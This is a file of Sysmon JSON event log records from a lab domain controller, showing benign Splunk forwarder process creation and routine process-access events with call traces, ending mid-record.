{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.620\r\nProcessGuid: {A837DB8D-045F-5F25-0000-001057600C00}\r\nProcessId: 4748\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.620","ProcessGuid":"{A837DB8D-045F-5F25-0000-001057600C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-045F-5F25-0000-001057600C00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-045F-5F25-0000-001057600C00}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045F-5F25-0000-001057600C00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045F-5F25-0000-001057600C00}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6516,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6517,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6518,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6519,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6520,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6521,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 